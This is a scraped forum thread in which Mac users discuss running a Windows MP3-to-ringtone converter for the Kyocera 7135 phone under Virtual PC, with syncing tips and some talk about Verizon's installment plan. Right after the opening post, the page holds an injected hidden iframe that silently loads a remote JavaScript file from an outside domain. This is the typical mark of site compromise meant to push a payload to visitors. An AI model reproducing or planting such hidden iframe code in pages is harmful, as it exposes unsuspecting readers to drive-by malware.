+ Reply to Thread

Ringer Converter on Virtual PC

I'm eagerly waiting the arrival of my 7135 and I was thinking about us mac users not being able to create our own ringtones. I'm a pretty recent switcher so I dont know if what I am asking is possible. Couldnt we run a MP3 to ringtone conversion program under Virtual PC and then move the file so we could sync it? That would at least get us thru until somebody created a Mac-centric program.

Any thoughts?

Jax<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Ringer Converter on Virtual PC

Originally posted by Jaxxon
    I'm eagerly waiting the arrival of my 7135 and I was thinking about us mac users not being able to create our own ringtones. I'm a pretty recent switcher so I dont know if what I am asking is possible. Couldnt we run a MP3 to ringtone conversion program under Virtual PC and then move the file so we could sync it? That would at least get us thru until somebody created a Mac-centric program.

Any thoughts?

Jax
    The converter will probably work well in virtual PC. It appears to be just putting a header on the mp3 to identify it in the Palm software and adding the pdb extension. I don't see anything happening that virtual PC shouldn't be able to handle. If not, I think there are enough helpful people on this board that if you posted MP3's to the file section with a request that they be converted to ringers, one of us would take care of it for you.

Alan

Sounds great..I will give it a shot when I get home. Thanx

This is why I kept my PC...

I use it for games, and for just such an emergency.

Everything else I use my Ti Powerbook.

Its nice to see and hear that I am not the only one who has made the switch and is as happy as I am. I on the other hand though am not able to get the 7135 when it first comes out, I have to wait till it drops in price a little...... its tough being on a budget

Tough being on a budget.
    I hear ya. That's why I am using Verizon's installment plan over the next 2 years.

:cashwalle

And why I didn't get one through GetConnected. Money's tight, but I must have technology!

What is Verizon's Installment plan, I don't think I've ever heard of that....... do tell

Basically they break the cost of the phone up over a 2 year contract. It's like an extra $25-30 a month added to your bill.

Interest free, I believe.

That would be a beautiful thing for me. I was wondering if they could do something like that.

Awesome!

Re: Re: Ringer Converter on Virtual PC

Originally posted by alanb
    The converter will probably work well in virtual PC. It appears to be just putting a header on the mp3 to identify it in the Palm software and adding the pdb extension. I don't see anything happening that virtual PC shouldn't be able to handle. If not, I think there are enough helpful people on this board that if you posted MP3's to the file section with a request that they be converted to ringers, one of us would take care of it for you.

Alan
    Anyone have the details on this? Sounds like an easy program...someone should write it up for OSX!
    "Why all the pearls, why the blue hair, why anything!?"

I'm running the MP3 converter on VPC (as well as the PhotoSuite app).
    Everything works just fine.
    MacOS 10.2.5, VPC 6.0.1 running W2k.

You'll probably want to synch from your mac (for one, it allows you to keep your files in one spot -- on your mac, and also, I've yet to figure out how to get VPC's USB driver to see the Kyocera cradle).
    Only thing to watch out for is the destination folder where these apps place their files to be installed. There is (a) the folder inside the disk drive of VPC client (usually in Program_FilesPalmyourname), and (b) the folder on your Mac (usually in /users/yourname/Documents/Palm/Users/yourname) . Just copy the files from (a) to (b) after you've run the MP3 or PhotoSuite apps. I have a VPC shared folder set up (pointing to my Mac Palm User folder) with an alias on my VPC desktop, and this makes it easy.

Same here. I'm running Mac OS X as well with Virtual PC and the MP3 converter is working pretty nicely. I just converted a cool beeping techno sound for my primary ringer.